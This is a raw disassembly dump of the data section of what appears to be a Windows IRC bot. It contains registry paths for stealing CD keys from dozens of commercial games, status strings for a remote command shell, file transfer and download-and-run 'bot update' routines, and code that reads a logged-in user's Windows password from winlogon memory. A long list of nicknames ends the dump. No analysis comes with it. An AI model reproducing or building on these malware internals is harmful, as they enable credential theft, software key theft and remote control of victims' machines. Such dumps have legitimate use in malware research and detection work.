; DATA XREF: .data:0044E42C�o
align 10h
aCdkey_3 db 'CDKey',0 ; DATA XREF: .data:0044E430�o
align 4
aUnrealTourna_0 db 'Unreal Tournament 2004',0 ; DATA XREF: .data:0044E434�o
align 10h
aSoftwareIgi2Re db 'Software\IGI 2 Retail',0 ; DATA XREF: .data:0044E444�o
align 4
aCdkey_4 db 'CDKey',0 ; DATA XREF: .data:0044E448�o
align 10h
aIgi2CovertStri db 'IGI 2: Covert Strike',0 ; DATA XREF: .data:0044E44C�o
align 4
aSoftwareElectr db 'Software\Electronic Arts\EA Distribution\Freedom Force\ergc',0
; DATA XREF: .data:0044E45C�o
aFreedomForce db 'Freedom Force',0 ; DATA XREF: .data:0044E464�o
align 4
aSoftwareElec_0 db 'Software\Electronic Arts\EA GAMES\Battlefield 1942\ergc',0
; DATA XREF: .data:0044E474�o
aBattlefield194 db 'Battlefield 1942',0 ; DATA XREF: .data:0044E47C�o
align 10h
aSoftwareElec_1 db 'Software\Electronic Arts\EA GAMES\Battlefield 1942 The Road to Ro'
; DATA XREF: .data:0044E48C�o
db 'me\ergc',0
align 4
aBattlefield1_0 db 'Battlefield 1942 (Road To Rome)',0 ; DATA XREF: .data:0044E494�o
aSoftwareElec_2 db 'Software\Electronic Arts\EA GAMES\Battlefield 1942 Secret Weapons'
; DATA XREF: .data:0044E4A4�o
db ' of WWII\ergc',0
align 4
aBattlefield1_1 db 'Battlefield 1942 (Secret Weapons of WWII)',0
; DATA XREF: .data:0044E4AC�o
align 4
aSoftwareElec_3 db 'Software\Electronic Arts\EA GAMES\Battlefield Vietnam\ergc',0
; DATA XREF: .data:0044E4BC�o
align 4
aBattlefieldVie db 'Battlefield Vietnam',0 ; DATA XREF: .data:0044E4C4�o
aSoftwareElec_4 db 'Software\Electronic Arts\EA GAMES\Black and White\ergc',0
; DATA XREF: .data:0044E4D4�o
align 10h
aBlackAndWhite db 'Black and White',0 ; DATA XREF: .data:0044E4DC�o
aSoftwareElec_5 db 'Software\Electronic Arts\EA GAMES\Command and Conquer Generals Ze'
; DATA XREF: .data:0044E4EC�o
db 'ro Hour\ergc',0
align 10h
aCommandAndConq db 'Command and Conquer: Generals (Zero Hour)',0
; DATA XREF: .data:0044E4F4�o
align 4
aSoftwareElec_6 db 'Software\Electronic Arts\EA GAMES\James Bond 007 Nightfire\ergc',0
; DATA XREF: .data:0044E504�o
aJamesBond007Ni db 'James Bond 007: Nightfire',0 ; DATA XREF: .data:0044E50C�o
align 4
aSoftwareElec_7 db 'Software\Electronic Arts\EA GAMES\Generals\ergc',0
; DATA XREF: .data:0044E51C�o
aCommandAndCo_0 db 'Command and Conquer: Generals',0 ; DATA XREF: .data:0044E524�o
align 4
aSoftwareElec_8 db 'Software\Electronic Arts\EA GAMES\Global Operations\ergc',0
; DATA XREF: .data:0044E534�o
align 4
aGlobalOperatio db 'Global Operations',0 ; DATA XREF: .data:0044E53C�o
align 4
aSoftwareElec_9 db 'Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault\e'
; DATA XREF: .data:0044E54C�o
db 'rgc',0
align 10h
aMedalOfHonorAl db 'Medal of Honor: Allied Assault',0 ; DATA XREF: .data:0044E554�o
align 10h
aSoftwareEle_10 db 'Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault B'
; DATA XREF: .data:0044E564�o
db 'reakthrough\ergc',0
align 4
aMedalOfHonor_0 db 'Medal of Honor: Allied Assault: Breakthrough',0
; DATA XREF: .data:0044E56C�o
align 4
aSoftwareEle_11 db 'Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault S'
; DATA XREF: .data:0044E57C�o
db 'pearhead\ergc',0
align 4
aMedalOfHonor_1 db 'Medal of Honor: Allied Assault: Spearhead',0
; DATA XREF: .data:0044E584�o
align 10h
aSoftwareEle_12 db 'Software\Electronic Arts\EA GAMES\Need For Speed Hot Pursuit 2',0
; DATA XREF: .data:0044E594�o
align 10h
aErgc db 'ergc',0 ; DATA XREF: .data:0044E598�o
align 4
aNeedForSpeedHo db 'Need For Speed Hot Pursuit 2',0 ; DATA XREF: .data:0044E59C�o
align 4
aSoftwareEle_13 db 'Software\Electronic Arts\EA GAMES\Need For Speed Underground\ergc'
; DATA XREF: .data:0044E5AC�o
db 0
align 4
aNeedForSpeedUn db 'Need For Speed: Underground',0 ; DATA XREF: .data:0044E5B4�o
aSoftwareEle_14 db 'Software\Electronic Arts\EA GAMES\Shogun Total War - Warlord Edit'
; DATA XREF: .data:0044E5C4�o
db 'ion\ergc',0
align 4
aShogunTotalWar db 'Shogun: Total War: Warlord Edition',0 ; DATA XREF: .data:0044E5CC�o
align 4
aSoftwareEle_15 db 'Software\Electronic Arts\EA Sports\FIFA 2002\ergc',0
; DATA XREF: .data:0044E5DC�o
align 4
aFifa2002 db 'FIFA 2002',0 ; DATA XREF: .data:0044E5E4�o
align 4
aSoftwareEle_16 db 'Software\Electronic Arts\EA Sports\FIFA 2003\ergc',0
; DATA XREF: .data:0044E5F4�o
align 4
aFifa2003 db 'FIFA 2003',0 ; DATA XREF: .data:0044E5FC�o
align 4
aSoftwareEle_17 db 'Software\Electronic Arts\EA Sports\NHL 2002\ergc',0
; DATA XREF: .data:0044E60C�o
align 4
aNhl2002 db 'NHL 2002',0 ; DATA XREF: .data:0044E614�o
align 4
aSoftwareEle_18 db 'Software\Electronic Arts\EA Sports\NHL 2003\ergc',0
; DATA XREF: .data:0044E624�o
align 4
aNhl2003 db 'NHL 2003',0 ; DATA XREF: .data:0044E62C�o
align 4
aSoftwareEle_19 db 'Software\Electronic Arts\EA Sports\Nascar Racing 2002\ergc',0
; DATA XREF: .data:0044E63C�o
align 4
aNascarRacing20 db 'Nascar Racing 2002',0 ; DATA XREF: .data:0044E644�o
align 4
aSoftwareEle_20 db 'Software\Electronic Arts\EA Sports\Nascar Racing 2003\ergc',0
; DATA XREF: .data:0044E654�o
align 4
aNascarRacing_0 db 'Nascar Racing 2003',0 ; DATA XREF: .data:0044E65C�o
align 4
aSoftwareRedSto db 'Software\Red Storm Entertainment\RAVENSHIELD',0
; DATA XREF: .data:0044E66C�o
align 4
aCdkey_5 db 'CDKey',0 ; DATA XREF: .data:0044E670�o
align 10h
aRainbowSixIiiR db 'Rainbow Six III RavenShield',0 ; DATA XREF: .data:0044E674�o
aSoftwareWestwo db 'Software\Westwood\Tiberian Sun',0 ; DATA XREF: .data:0044E684�o
align 4
aSerial db 'Serial',0 ; DATA XREF: .data:0044E688�o
align 4
aCommandAndCo_1 db 'Command and Conquer: Tiberian Sun',0 ; DATA XREF: .data:0044E68C�o
align 4
aSoftwareWest_0 db 'Software\Westwood\Red Alert',0 ; DATA XREF: .data:0044E69C�o
aSerial_0 db 'Serial',0 ; DATA XREF: .data:0044E6A0�o
align 4
aCommandAndCo_2 db 'Command and Conquer: Red Alert',0 ; DATA XREF: .data:0044E6A4�o
align 4
aSoftwareWest_1 db 'Software\Westwood\Red Alert 2',0 ; DATA XREF: .data:0044E6B4�o
align 4
aSerial_1 db 'Serial',0 ; DATA XREF: .data:0044E6B8�o
align 4
aCommandAndCo_3 db 'Command and Conquer: Red Alert 2',0 ; DATA XREF: .data:0044E6BC�o
align 4
aSoftwareWest_2 db 'Software\Westwood\NOX',0 ; DATA XREF: .data:0044E6CC�o
align 10h
aSerial_2 db 'Serial',0 ; DATA XREF: .data:0044E6D0�o
align 4
aNox db 'NOX',0 ; DATA XREF: .data:0044E6D4�o
aSoftwareTechla db 'Software\Techland\Chrome',0 ; DATA XREF: .data:0044E6E4�o
align 4
aSerialnumber db 'SerialNumber',0 ; DATA XREF: .data:0044E6E8�o
align 4
aChrome db 'Chrome',0 ; DATA XREF: .data:0044E6EC�o
align 10h
aSoftwareIllusi db 'Software\Illusion Softworks\Hidden & Dangerous 2',0
; DATA XREF: .data:0044E6FC�o
align 4
aKey_2 db 'key',0 ; DATA XREF: .data:0044E700�o
aHiddenDangerou db 'Hidden & Dangerous 2',0 ; DATA XREF: .data:0044E704�o
align 10h
aSoftwareActivi db 'Software\Activision\Soldier of Fortune II - Double Helix',0
; DATA XREF: .data:0044E714�o
align 4
aInstallpath db 'InstallPath',0 ; DATA XREF: .data:0044E718�o
aSoldierOfFortu db 'Soldier of Fortune II - Double Helix',0 ; DATA XREF: .data:0044E71C�o
align 10h
aBaseMpSof2key db 'base\mp\sof2key',0 ; DATA XREF: .data:0044E720�o
aMtkwftmkemfew3 db 'mtkwftmkemfew3p3b7',0 ; DATA XREF: .data:0044E724�o
align 4
aSoftwareBiowar db 'Software\BioWare\NWN\Neverwinter',0 ; DATA XREF: .data:0044E72C�o
align 4
aLocation db 'Location',0 ; DATA XREF: .data:0044E730�o
align 4
aNeverwinterNig db 'Neverwinter Nights',0 ; DATA XREF: .data:0044E734�o
align 4
aNwncdkey_ini db 'nwncdkey.ini',0 ; DATA XREF: .data:0044E738�o
align 4
aKey1 db 'Key1=',0 ; DATA XREF: .data:0044E73C�o
align 10h
aSoftwareBiow_0 db 'Software\BioWare\NWN\Neverwinter',0 ; DATA XREF: .data:0044E744�o
align 4
aLocation_0 db 'Location',0 ; DATA XREF: .data:0044E748�o
align 10h
aNeverwinterN_0 db 'Neverwinter Nights (Shadows of Undrentide)',0
; DATA XREF: .data:0044E74C�o
align 4
aNwncdkey_ini_0 db 'nwncdkey.ini',0 ; DATA XREF: .data:0044E750�o
align 4
aKey2 db 'Key2=',0 ; DATA XREF: .data:0044E754�o
align 4
aSoftwareBiow_1 db 'Software\BioWare\NWN\Neverwinter',0 ; DATA XREF: .data:0044E75C�o
align 4
aLocation_1 db 'Location',0 ; DATA XREF: .data:0044E760�o
align 4
aNeverwinterN_1 db 'Neverwinter Nights (Hordes of the Underdark)',0
; DATA XREF: .data:0044E764�o
align 4
aNwncdkey_ini_1 db 'nwncdkey.ini',0 ; DATA XREF: .data:0044E768�o
align 4
aKey3 db 'Key3=',0 ; DATA XREF: .data:0044E76C�o
align 4
; char aSS_7[]
aSS_7 db '%s\%s',0 ; DATA XREF: sub_4165C9+79�o
align 4
; char aR_1[]
aR_1: ; DATA XREF: sub_4165C9+8A�o
unicode 0, <r>,0
; char asc_44F628[]
asc_44F628: ; DATA XREF: sub_4165C9+DE�o
unicode 0, <=>,0
; char asc_44F62C[]
asc_44F62C: ; DATA XREF: sub_4165C9+E9�o
unicode 0, <=>,0
dword_44F630 dd 234032Dh, 656B6463h, 3027379h, 7325202Dh, 7325203Ah
; DATA XREF: sub_4165C9+FB�o
dd 0
; char asc_44F648[]
asc_44F648 db '-' ; DATA XREF: sub_4165C9+109�o
db 3, 34h, 2
dd 656B6463h, 3027379h, 7325202Dh, 7325203Ah, 0
; char asc_44F660[]
asc_44F660 db '-' ; DATA XREF: sub_4165C9+15B�o
db 3, 34h, 2
dd 656B6463h, 3027379h, 7325202Dh, 7325203Ah, 0
; char asc_44F678[]
asc_44F678 db '-' ; DATA XREF: sub_4167F7+47�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToOpenSo db '- failed to open socket',0
align 4
; char asc_44F69C[]
asc_44F69C db '-' ; DATA XREF: sub_4167F7+AB�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToOpenRe db '- failed to open remote command shell',0
align 4
; char asc_44F6CC[]
asc_44F6CC db 0Ah,0 ; DATA XREF: sub_4167F7+138�o
align 10h
; char asc_44F6D0[]
asc_44F6D0 db '-' ; DATA XREF: sub_4167F7+170�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToSendTo db '- failed to send to Remote command shell',0
align 4
unk_44F704 db 2Dh ; - ; DATA XREF: sub_4169B8+44�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToCrea_3 db '- failed to create socket',0
align 4
unk_44F728 db 2Dh ; - ; DATA XREF: sub_4169B8+82�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToBindTo db '- failed to bind to socket',0
unk_44F74C db 2Dh ; - ; DATA XREF: sub_4169B8+FD�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToOpen_0 db '- failed to open socket',0
align 10h
unk_44F770 db 2Dh ; - ; DATA XREF: sub_4169B8+127�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFileDoesnTExis db '- file doesn',27h,'t exist',0
align 10h
; char dword_44F790
dword_44F790 dd 43434401h, 4E455320h, 73252044h, 20692520h, 25206925h
; DATA XREF: sub_4169B8+16A�o
dd 169h
dword_44F7A8 dd 234032Dh, 2636364h, 73202D03h, 20646E65h, 656D6974h
; DATA XREF: sub_4169B8+1CB�o
dd 74756Fh
; char asc_44F7C0[]
asc_44F7C0 db '-' ; DATA XREF: sub_4169B8+202�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aUnableToOpenSo db '- unable to open socket',0
align 4
dword_44F7E4 dd 234032Dh, 2636364h, 73202D03h, 656B636Fh, 72652074h
; DATA XREF: sub_4169B8+36B�o
dd 726F72h
dword_44F7FC dd 234032Dh, 2636364h, 73202D03h, 656B636Fh, 72652074h
; DATA XREF: sub_4169B8+37C�o
dd 726F72h
; char asc_44F814[]
asc_44F814 db '-' ; DATA XREF: sub_4169B8+2FA�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFileSSentToSSB db '- file %s sent to %s (%s bytes).',0
align 10h
; char aSS_8[]
aSS_8 db '%s%s',0 ; DATA XREF: sub_416D5D+54�o
align 4
unk_44F848 db 2Dh ; - ; DATA XREF: sub_416D5D+83�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aErrorUnableToW db '- error unable to write file to disk',0
align 4
; char aAB[]
aAB db 'a+b',0 ; DATA XREF: sub_416D5D+97�o
unk_44F87C db 2Dh ; - ; DATA XREF: sub_416D5D+AB�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aErrorOpeningFi db '- error opening file for writing',0
align 4
; char asc_44F8A8[]
asc_44F8A8 db '-' ; DATA XREF: sub_416D5D+CB�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aErrorOpeningSo db '- error opening socket',0
; char asc_44F8C8[]
asc_44F8C8 db '-' ; DATA XREF: sub_416D5D+156�o
db 3, 34h, 2
dd 2636364h, 73202D03h, 656B636Fh, 72652074h, 726F72h
; char asc_44F8E0[]
asc_44F8E0 db '-' ; DATA XREF: sub_416D5D+1D1�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aReceivedSFromS db '- received %s from %s (%s bytes).',0
align 4
; char asc_44F90C[]
asc_44F90C db '-' ; DATA XREF: sub_416F9A+77�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aCouldnTOpenF_0 db 'couldn',27h,'t open file: %s',0
align 4
unk_44F934 db 2Dh ; - ; DATA XREF: sub_416F9A+183�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloadedSDkb db 'downloaded %s (%dKB)',0
align 4
; char asc_44F95C[]
asc_44F95C db '-' ; DATA XREF: sub_416F9A+195�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aGotUpdateSDkb_ db 'got update %s (%dKB).',0
align 4
; char asc_44F984[]
asc_44F984 db '-' ; DATA XREF: sub_416F9A+1D8�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aWrongFilesizeD db 'wrong filesize (%d != %d).',0
align 10h
; char asc_44F9B0[]
asc_44F9B0 db '-' ; DATA XREF: sub_416F9A+262�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aWrongCrcDD_ db 'wrong crc (%d != %d).',0
align 4
; char asc_44F9D8[]
asc_44F9D8 db '-' ; DATA XREF: sub_416F9A+2E1�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloaded_1fK db 'downloaded %.1f KB to %s @ %.1f KB/sec',0
align 10h
aOpen_2 db 'open',0 ; DATA XREF: sub_416F9A+336�o
align 4
; char asc_44FA18[]
asc_44FA18 db '-' ; DATA XREF: sub_416F9A+358�o
db 3, 34h, 2
dd 6E776F64h, 64616F6Ch, 202D0302h, 6E65706Fh, 25206465h
dd 73h
; char asc_44FA34[]
asc_44FA34 db '-' ; DATA XREF: sub_416F9A+3C9�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloaded_1fk db 'downloaded %.1fKB to %s @ %.1fKB/sec, updating bot',0
align 4
unk_44FA78 db 2Dh ; - ; DATA XREF: sub_416F9A+485�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aUpdateFailedEr db 'update failed, error executing %s',0
align 4
; char asc_44FAAC[]
asc_44FAAC db '-' ; DATA XREF: sub_416F9A+493�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aBadUrlOrDnsErr db 'bad url or dns error at %s.',0
aUnknown db 'Unknown',0 ; DATA XREF: sub_417542:loc_417585�o
aInvalid db 'Invalid',0 ; DATA XREF: sub_417542:loc_41757F�o
aDisk db 'Disk',0 ; DATA XREF: sub_417542:loc_417579�o
align 10h
aNetwork db 'Network',0 ; DATA XREF: sub_417542:loc_417573�o
aCdrom db 'Cdrom',0 ; DATA XREF: sub_417542:loc_41756D�o
align 10h
off_44FB00 dd offset word_4D4152 ; DATA XREF: sub_417542:loc_417567�o
dword_44FB04 dd 3Fh ; DATA XREF: sub_417542+1F�o
; char aFailed[]
aFailed db 'failed',0 ; DATA XREF: sub_4175D3+E9�o
align 10h
; char aFailed_0[]
aFailed_0 db 'failed',0 ; DATA XREF: sub_4175D3+FC�o
align 4
; char aFailed_1[]
aFailed_1 db 'failed',0 ; DATA XREF: sub_4175D3+10F�o
align 10h
; char aSkb[]
aSkb db '%sKB',0 ; DATA XREF: sub_4175D3+72�o
align 4
; char aSkb_0[]
aSkb_0 db '%sKB',0 ; DATA XREF: sub_4175D3+9F�o
align 10h
; char aSkb_1[]
aSkb_1 db '%sKB',0 ; DATA XREF: sub_4175D3+CC�o
align 4
; char aFailed_2[]
aFailed_2 db 'failed',0 ; DATA XREF: sub_417703+3B�o
align 10h
; char asc_44FB40[]
asc_44FB40 db '-' ; DATA XREF: sub_417703+58�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aSDriveSFailedT db '%s drive (%s): failed to stat, device not ready',0
; char asc_44FB7C[]
asc_44FB7C db '-' ; DATA XREF: sub_417703+8E�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aSDriveSSTotalS db '%s drive (%s): %s total, %s free, %s available',0
align 4
; char aA_1[]
aA_1 db 'A:\',0 ; DATA XREF: sub_4177D5:loc_41781A�o
; char asc_44FBBC[]
asc_44FBBC db '-' ; DATA XREF: sub_41785A+5C�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aSearchingFor_0 db 'searching for file %s',0
align 4
; char asc_44FBE4[]
asc_44FBE4 db '-' ; DATA XREF: sub_41785A+C8�o
db 3, 34h, 2
dd 646E6966h, 656C6966h, 202D0302h, 6E756F66h, 64252064h
dd 6C696620h, 7365h
; char aS_29[]
aS_29 db '%s\*',0 ; DATA XREF: sub_417975+1A�o
align 4
; char aSS_9[]
aSS_9 db '%s\%s',0 ; DATA XREF: sub_417975+7A�o
align 4
; char aSS_10[]
aSS_10 db '%s\%s',0 ; DATA XREF: sub_417975+CE�o
align 4
; char asc_44FC1C[]
asc_44FC1C db '-' ; DATA XREF: sub_417975+107�o
db 3, 34h, 2
dd 646E6966h, 656C6966h, 202D0302h, 6E756F66h, 73252064h
dd 73255Ch
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_417AC3+40�o
align 4
aNtdll_dll db 'NTDLL.DLL',0 ; DATA XREF: sub_417AC3+55�o
align 4
aNtquerysystemi db 'NtQuerySystemInformation',0 ; DATA XREF: sub_417AC3+68�o
align 4
aRtlcreatequery db 'RtlCreateQueryDebugBuffer',0 ; DATA XREF: sub_417AC3+73�o
align 10h
aRtlqueryproces db 'RtlQueryProcessDebugInformation',0 ; DATA XREF: sub_417AC3+80�o
aRtldestroyquer db 'RtlDestroyQueryDebugBuffer',0 ; DATA XREF: sub_417AC3+8D�o
align 4
aRtlrundecodeun db 'RtlRunDecodeUnicodeString',0 ; DATA XREF: sub_417AC3+9A�o
align 4
aUsername: ; DATA XREF: sub_417AC3+CE�o
unicode 0, <USERNAME>,0
align 4
aUserdomain: ; DATA XREF: sub_417AC3+DC�o
unicode 0, <USERDOMAIN>,0
align 4
; char asc_44FD14[]
asc_44FD14 db '-' ; DATA XREF: sub_417AC3+117�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
db 57h ; W
db 69h, 6Eh, 4Ch
db 6Fh ; o
db 67h, 6Fh, 6Eh
db 20h
db 49h, 6Eh, 66h
db 6Fh ; o
db 72h, 6Dh, 61h
db 74h ; t
db 69h, 6Fh, 6Eh
db 20h
db 28h, 50h, 49h
db 44h ; D
db 20h, 25h, 64h
db 29h ; )
db 20h, 2Dh, 20h
db 2
db 44h, 6Fh, 6Dh
db 61h ; a
db 69h, 6Eh, 2
db 3Ah ; :
db 20h, 2 dup(5Ch)
db 25h ; %
db 53h, 2Ch, 20h
db 2
db 55h, 73h, 65h
db 72h ; r
db 2, 3Ah, 20h
aSNoPassword_ db '(%S/(no password)).',0
unk_44FD70 db 2Dh ; - ; DATA XREF: sub_417AC3:loc_417C08�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aUnableToFindTh db 'unable to find the password in memory',0
align 4
; char asc_44FDA8[]
asc_44FDA8 db '-' ; DATA XREF: sub_417AC3:loc_417C0F�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aUnableToFindWi db 'unable to find winlogon pid',0
aSedebugprivi_0 db 'SeDebugPrivilege',0 ; DATA XREF: sub_417AC3+161�o
align 4
; char asc_44FDE8[]
asc_44FDE8 db '-' ; DATA XREF: sub_417AC3:loc_417C3C�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aFailedToEnable db 'failed to enable debug privilege',0
align 4
unk_44FE1C db 2Dh ; - ; DATA XREF: sub_417AC3+35�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aOnlySupportedO db 'only supported on winnt/win2k',0
align 4
; char aWinlogon[]
aWinlogon db 'WINLOGON',0 ; DATA XREF: sub_417C95+AF�o
align 4
; char aNwgina[]
aNwgina db 'NWGINA',0 ; DATA XREF: sub_417C95+123�o
align 10h
; char aMsgina[]
aMsgina db 'MSGINA',0 ; DATA XREF: sub_417C95+13E�o
align 4
; char asc_44FE68[]
asc_44FE68 db '-' ; DATA XREF: sub_4180FB+70�o
db 3, 34h, 2
dd 646E6966h, 73736170h, 202D0302h, 4C6E6957h, 6E6F676Fh
dd 666E4920h, 616D726Fh, 6E6F6974h, 49502820h, 64252044h
dd 202D2029h, 6D6F4402h, 26E6961h, 5C5C203Ah, 202C5325h
dd 65735502h, 203A0272h, 2F532528h, 295325h
; char asc_44FEB8[]
asc_44FEB8 db '-' ; DATA XREF: sub_418192+C7�o
db 3, 34h, 2
dd 646E6966h, 73736170h, 202D0302h, 4C6E6957h, 6E6F676Fh
dd 666E4920h, 616D726Fh, 6E6F6974h, 49502820h, 64252044h
dd 202D2029h, 6D6F4402h, 26E6961h, 5C5C203Ah, 202C5325h
dd 65735502h, 203A0272h, 2F532528h, 295325h
; char asc_44FF08[]
asc_44FF08 db '-' ; DATA XREF: sub_418192+E1�o
db 3, 34h, 2
dd 646E6966h, 73736170h, 202D0302h, 4C6E6957h, 6E6F676Fh
dd 666E4920h, 616D726Fh, 6E6F6974h, 49502820h, 64252044h
dd 202D2029h, 6D6F4402h, 26E6961h, 5C5C203Ah, 202C5325h
dd 65735502h, 203A0272h, 2F532528h, 412F4E28h, 2929h
; char *off_44FF5C
off_44FF5C dd offset dword_4503F4 ; DATA XREF: sub_418688+5C�r
dd offset dword_4503F8
dd offset dword_4503FC
dd offset dword_450400
dd offset dword_450404
dd offset dword_450408
dd offset dword_45040C
dd offset dword_450410
dd offset dword_450414
dd offset dword_450418
dd offset dword_45041C
dd offset dword_450420
dd offset dword_450424
dd offset dword_450428
dd offset dword_45042C
dd offset dword_450430
dd offset dword_450434
dd offset dword_450438
dd offset dword_45043C
dd offset dword_450440
dd offset dword_450444
dd offset dword_450448
dd offset dword_45044C
dd offset dword_450450
dd offset dword_450454
dd offset dword_450458
dd offset dword_45045C
dd offset dword_450460
dd offset dword_450464
dd offset dword_450468
dd offset dword_45046C
dd offset dword_450470
dd offset dword_450474
dd offset dword_450478
dd offset dword_45047C
dd offset dword_450480
dd offset dword_450484
dd offset dword_450488
dd offset dword_45048C
dd offset dword_450490
dd offset dword_450494
dd offset dword_450498
dd offset dword_45049C
dd offset dword_4504A0
dd offset dword_4504A4
dd offset dword_4504A8
dd offset dword_4504AC
dd offset dword_4504B0
dd offset dword_4504B4
dd offset dword_4504B8
dd offset dword_4504BC
dd offset aSmartmir ; "SMARTMIR"
dd offset aFarooq ; "farooq"
dd offset aMaxxguy ; "maxxguy"
dd offset aBobmarley ; "BOBMARLEY"
dd offset aEmilya ; "emilya"
dd offset aKrizha ; "KRIZHA"
dd offset aCar1nna ; "Car1nna"
dd offset aSwin ; "swin"
dd offset aMale ; "male"
dd offset aKoko ; "koko"
dd offset aFlexster ; "flexster"
dd offset aKen ; "ken"
dd offset aShez ; "Shez"
dd offset aTalika ; "talika"
dd offset aMarcy ; "marcy"
dd offset aCme ; "cme"
dd offset aHeval ; "heval"
dd offset aBunty ; "bunty"
dd offset aJanno ; "janno"
dd offset aRimpy ; "rimpy"
dd offset aNastysha ; "nastysha"
dd offset aLuisa ; "Luisa"
dd offset aTroller ; "troller"
dd offset aManee ; "manee"
dd offset aKermit ; "kermit"
dd offset aPuregold ; "puregold"
dd offset aCoredump ; "CoreDump"
dd offset aImra ; "imra"
dd offset aGirl ; "GirL"
dd offset aCamel ; "CAMEL"
dd offset aReshma ; "reshma"
dd offset aKencing ; "Kencing"
dd offset aThr45h3r5 ; "THR45H3R5"
dd offset aCansuuuu ; "cansuuuu"
dd offset aKaan38dent ; "kaan38dent"
dd offset aErkan27 ; "erkan27"
dd offset aHexaaa ; "hexaaa"
dd offset aBerk19 ; "berk19"
dd offset aObenibisevse ; "OBeNiBiSeVSe"
dd offset aIrmal ; "irmal"
dd offset aMisssunday ; "misssunday"
dd offset aTolga34 ; "Tolga34"
dd offset aJericho ; "JERICHO"
dd offset aMary_0 ; "MARY"
dd offset aAkin ; "AKIN"
dd offset aMelekk ; "melekk"
dd offset aTrend3 ; "trend3"
dd offset aMERVE ; "M-E-R-V-E"
dd offset aTekir ; "tekir"
dd offset aVenedik34 ; "venedik34"
dd offset aSevmekmi ; "sevmekmi"
dd offset aSudenur ; "SUDENUR"
dd offset aArzu ; "ARZU"
dd offset aHaticem ; "haticem"
dd offset aErnesto ; "ERNESTO"
dd offset aAslii ; "aslii"
dd offset aPiramit ; "PIRAMIT"
dd offset aSamyeli21 ; "samyeli21"
dd offset aRetg ; "RETG"
dd offset aBlackpearl ; "blackpearl"
dd offset aPelincik ; "pelincik"
dd offset aAhmet ; "ahmet"
dd offset aTurkyy ; "turkyy"
dd offset aAnk32m ; "ank32m"
dd offset aZack ; "ZACK"
dd offset aIzmir39m ; "Izmir39m"
dd offset aAlbina ; "albina"
dd offset aAyla ; "AYLA-"
dd offset off_450724
dd offset aAnkh ; "ankh"
dd offset aDonjuanm ; "Donjuanm"
dd offset aBogac ; "bogac"
dd offset aAlpay34m ; "alpay34m"
dd offset aCongueror ; "CoNGuERoR"
dd offset aDenizlim ; "DenizliM"
dd offset aBerk19m ; "Berk19m"
dd offset aDevran ; "devran"
dd offset aArda ; "arda"
dd offset aKeyiflisert ; "keyifliSERT"
dd offset aMurat34M ; "murat34-m"
dd offset aHakan3 ; "hakan3"
dd offset aImirzali ; "IMIRZALI--"
dd offset aRamtha ; "RAMTHA"
dd offset aEmre ; "Emre--"
dd offset aElmaazyok ; "elmaazyok"
dd offset aEsmerkiz ; "Esmerkiz"
dd offset aKebikec ; "kebikec"
dd offset aFlord ; "FLoRD"
dd offset aHoly ; "holy"
dd offset aMahinur ; "MAHINUR"
